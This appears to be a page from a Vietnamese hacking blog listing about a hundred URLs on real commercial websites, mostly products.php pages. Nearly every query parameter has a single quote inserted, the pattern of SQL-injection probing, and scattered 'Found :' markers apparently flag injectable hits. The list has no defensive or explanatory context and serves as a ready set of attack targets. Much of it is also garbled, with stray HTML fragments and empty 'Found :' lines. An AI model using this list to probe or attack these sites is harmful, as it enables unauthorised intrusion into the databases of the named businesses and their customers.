http://plantoys.com/products.php?cat_id='2%26show_all='true"target='"_blank
http://www.hubbardbreeders.com/products.php?id='5"target='"_blank
http://www.beesto.com/index.php/extensions?id='6"target='"_blank
http://www.usstove.com/index.php?route='cms/article%26path='2%26article_id='2"target='"_blank
http://www.aorhealth.com/html/products.php?id='194"target='"_blank
http://www.crownhill.ca/investment_products.php?id='30"target='"_blank
http://www.buggyworld.com/parts/products.php?id='4"target='"_blank
http://www.autokeys.us/products.php?category_id='57"target='"_blank
http://www.autokeys.us/products.php?category_id='72"target='"_blank
http://www.reefindustries.com/products.php?id='23"target='"_blank
http://www.davescyclesupply.com/products.php?category_id='187"target='"_blank
Found : http://www.xtracpads.com/products.php?prod_id='27%26section='1"target='"_blank
http://www.martelcorp.com/?cat='114%26action='detail%26id='73"target='"_blank
Found :
http://www.fondriestbici.com/eng/products.php?cat='2%26id='19"target='"_blank
http://www.vecco.com/products.php?sub_cat_id='24"target='"_blank
http://muvipix.com/products.php?subcat_id='44"target='"_blank
http://www.filzer.com/products.php?id='102"target='"_blank
http://www.filzer.com/products.php?id='102"target='"_blank
http://www.syndicatelofts.com/shop/"target='"_blank
http://www.biobrite.com/products.php?category_id='1"target='"_blank
http://www.wateccameras.com/products.php?prod_id='187"target='"_blank
http://www.rollrite.com/products.php?c_id='17"target='"_blank
http://www.avalonprod.com/products.php?prod_id='9"target='"_blank
http://www.akiles.com/products.php?%26product_id='1025"target='"_blank
http://www.tntfireworks.com/products.php?id='SS%26pg='5"target='"_blank
http://www.mutazu.com/products.php?cat_id='1%26menu='DMY%2520Trunk%2520Series%26product_id='16%26s='prod.php"target='"_blank
http://www.emp-centauri.cz/products.php?id_kateg='5%26id_pkateg='20%26id='82"target='"_blank
http://www.ortega.com/products/products.php?id='7"target='"_blank
http://www.drainageonline.co.uk/products.php?category_id='18"target='"_blank
http://www.telit.com/en/products.php?p_id='3%26p_ac='show%26p='7"target='"_blank
http://lgnrevolution.com/products.php?id='NULL"target='"_blank
Found :
http://greenball.com/products.php?products_id='1"target='"_blank
http://www.rafaay.com/products.php?category_id='105"target='"_blank
Found :
http://www.muskyshop.com/modules/cart/products.php/nav_id/5/page/2/id/2321/name/StringeaseFastachMultiUseClip"target='"_blank
http://www.gs-sport.com/products.php?en_product_id='1"target='"_blank
Found :
http://www.birdladder.com/products.php?id='415%26path='459"target='"_blank
Found :
http://www.bishopstontrading.co.uk/shop/products.php?category_id='28"target='"_blank
http://www.musicalsounds.us/products.php?id='AcousticSolid"target='"_blank
http://www.codecorp.com/products.php?id='9"target='"_blank
http://www.tridentseafoods.com/retail/products.php?id='313"target='"_blank
Found :
http://www.firgelli.com/products.php?id='40"target='"_blank
http://www.tridentseafoods.com/retail/products.php?id='564"target='"_blank
http://www.mtqes.com.au/products.php?action='vehicle%26id='13"target='"_blank
http://greenball.com/products.php?products_id='9739"target='"_blank
Found : http://www.powermate.com/generators/products.php?cat_id='3%26s_id='25"target='"_blank
http://www.sargentlock.com/products/products.php?item_id='14"target='"_blank
http://expedition-timepiece.com/products.php?ID='38%26action='detail"target='"_blank
Found :
http://www.luckypet.com/products.php?cat='198"target='"_blank
Found :
http://www.bklighting.com/products.php?ID='319"target='"_blank
http://www.protofab4x4.com/products.php?ID='00%26ID2='48"target='"_blank
http://www.stullfeeders.com/products.php?id='139"target='"_blank
Found :
http://www.fullcirclehome.com/products.php?id='49%26prod_num='16"target='"_blank
http://www.bliby.net/products.php?id_page='8"target='"_blank
http://www.knaack.com/jobsite_storage_equipment/view_products.php?p_id='4"target='"_blank
Found :
http://www.viz.com/series"target='"_blank
http://spraywayblack.com/products.php?id='SP-295"target='"_blank
http://www.viz.com/product"target='"_blank
http://www.choretimepoultry.com/products.php?product_id='9"target='"_blank
http://cootacraft.com/products.php?prod_id='6"target='"_blank
http://www.elinchrom.com/products.php?p_id='216"target='"_blank
https://www.bavariasausage.com/shop/products.php?product_id='273%26storecategory_id='54"target='"_blank
Found :
http://sportcount.com/products.php?category_id='1"target='"_blank
http://www.deconlabs.com/products.php?ID='1"target='"_blank
http://www.rescuenorthwest.com/products.php?id='12"target='"_blank
http://www.alsacorp.eu/products.php?cat_id='1"target='"_blank
http://www.suitsyouswimwear.com/products.php?id='12"target='"_blank
http://downtown20.net/products.php?cat_id='2"target='"_blank
http://www.pistolgear.com/products.php?id='59"target='"_blank
http://downtown20.net/products.php?cat_id='2"target='"_blank
http://www.pistolgear.com/products.php?id='59"target='"_blank
http://www.giftsintl-us.com/products.php?cat='2"target='"_blank
http://www.budgetgroup.net/products.php?id_product_categ='77"target='"_blank
http://www.chefs-eg.com/products.php?id='mini"target='"_blank
http://www.kalopedis.com/products.php?ID='55"target='"_blank
http://allnaturalcosmetics.com/products.php?view='subcategories%26cat_id='4"target='"_blank
http://www.shakerhood.com/products.php?id='HemiParts"target='"_blank
http://coastalstudio.com/products.php?id='76"target='"_blank
http://www.imate.com/"target='"_blank
http://coastalstudio.com/products.php?id='76"target='"_blank
http://www.imate.com/"target='"_blank
Found :
Found : http://www.hughes-and-kettner.com/products.php5?mode='prod%26id='110"target='"_blank
Found :
http://www.equipro-bty.com/pages/products.php?id='1"target='"_blank
https://www.bavariasausage.com/shop/products.php?product_id='2417%26storecategory_id='29%26storesubcategory_id='6"target='"_blank
http://www.innerrange.com/products.php?id='54"target='"_blank
Found :
Found :
Found : http://www.hughes-and-kettner.com/products.php5?mode='prod%26id='11"target='"_blank
Found :
http://www.kannoa.com/products.php?type='category%26id='52"target='"_blank
http://www.thegadgetshop.co.za/products.php?prod_sec_id='372"target='"_blank
Found :
http://www.mustad.no/catalog/emea/products.php?id='43"target='"_blank
http://www.powerflowsystems.com/products.php?cat_id='11%26pid='13"target='"_blank
http://www.mustad.no/catalog/emea/products.php?id='43"target='"_blank
http://sheltersofamerica.com/products.php?id='1"target='"_blank
http://www.veroint.com/products.php?page_id='1"target='"_blank
http://idqusa.com/products.php?cat='13"target='"_blank
Found : http://www.xtracpads.com/products.php?prod_id='5%26section='1"target='"_blank
 

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương